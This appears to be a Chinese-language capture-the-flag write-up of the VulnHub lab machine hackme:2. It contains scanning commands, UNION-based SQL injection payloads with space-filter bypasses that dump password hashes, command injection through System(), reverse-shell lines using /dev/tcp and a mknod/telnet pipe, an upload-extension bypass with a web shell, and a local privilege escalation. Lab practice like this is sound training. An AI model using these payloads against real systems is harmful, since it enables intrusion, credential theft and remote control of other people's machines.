靶机地址
hackme:2~ VulnHub
靶机IP:192.168.245.131
测试机系统:kali、win10
测试机IP:192.168.245.129
目录
0.环境搭建
1.下载并导入靶机
打开vmware–文件–打开–hackme2-DHCP.ova
2.查看网络适配器
将靶机网络适配器改为NAT模式
3.启动靶机
点击 ▶靶机,开启成功
1.信息收集
1.1主机发现
arp-scan -l
1.2端口扫描
masscan --rate=100000 -p 0-65535 192.168.245.131
发现目标靶机22端口和80端口开启
1.3详细扫描
nmap -T4 -sV -O -p 22,80 192.168.245.131
1.4gobuster进行目录扫描
gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.245.131 -t 30
1.5网站指纹识别
2.漏洞挖掘
sql注入
1. 进入主页发现是登录页面,没有用户名及密码,但是页面有注册链接,进行注册用户
2.使用所注册的用户登陆成功
3. 利用sqlmap进行测试是否具有sql注入漏洞,发现失败,进行手工注入
sqlmap -u 'http://192.168.245.131/welcome.php' --data="search=OSINT" --cookie="PHPSESSID=boujv14h358os0cru6q5afevt9" --level=3 --risk=3
输入All或者Linux可以查询到一些表中存在的书名
推测的查询语句为
$sql = " SELECT * FROM BOOKS WHERE book_name LIKE '".$input."%';"
因此构造测试语句
All%' and '123 ' like '1 # 正常回显
从这,我们可以判断这里存在注入点
同时注意的是这需要用注释符代替空格,否则返回值为空
All%'/**/union/**/select/**/1,2,3'
使用 burp 抓查询数据包
All%'/**/union/**/select/**/1,database(),3' # 数据库
All%'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'webapphacking # 数据表
All%'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/'webapphacking'/**/and/**/table_name/**/like/**/'users # 字段
All%'/**/union/**/select/**/1,group_concat(user),group_concat(pasword)/**/from/**/users/**/where/**/111/**/like/**/'1 # 用户名、密码
通过在线的md5破解,可以得到管理员账号密码superadmin/Uncrackable
发现了一个可以进行文件上传的点
上传文件之后,页面上回显了上传路径
再次测试
First Name:0
Last Name:System('id')
成功回显,发现命令执行漏洞,尝试进行反弹shell
kali开启监听端口
nc -lvvp 7777
输入反弹shell命令发现失败
First Name:0
Last Name:System('/bin/sh -i >& /dev/tcp/192.168.245.131/7777 0>&1')
可以看到回显中将空格过滤掉了,这里添加特殊字符当空格也失败:
First Name:0
Last Name:System('/bin/sh${IFS}-i${IFS}>&${IFS}/dev/tcp/192.168.245.131/7777${IFS}0>&1')
换一种方法:
查看下文件welcomeadmin.php的源码看看能否找到上传的路径
First Name:0
Last Name:System('cat${IFS}welcomeadmin.php')
发现文件目录存在:
/var/www/html/uploads/year2020/
访问目标:
http://192.168.245.131/uploads/year2020/shell.php
通过welcomeadmin.php的源码分析,发现对如下后缀进行了过滤
html
js
php
php3
php4
php5
尝试上传phtml后缀
访问http://192.168.245.131/uploads/year2020/shell.phtml发现页面没有任何回显
进行蚁剑连接
3.权限提升
3.1信息收集
3.2反弹shell
使用刚刚开启的kali端口反弹shell,执行如下命令进行反弹:
mknod a p; telnet 192.168.245.131 7777 0<a | /bin/bash 1>a
3.3提权成功
cd /home/legacy
ls
./touchmenot
id
su root
id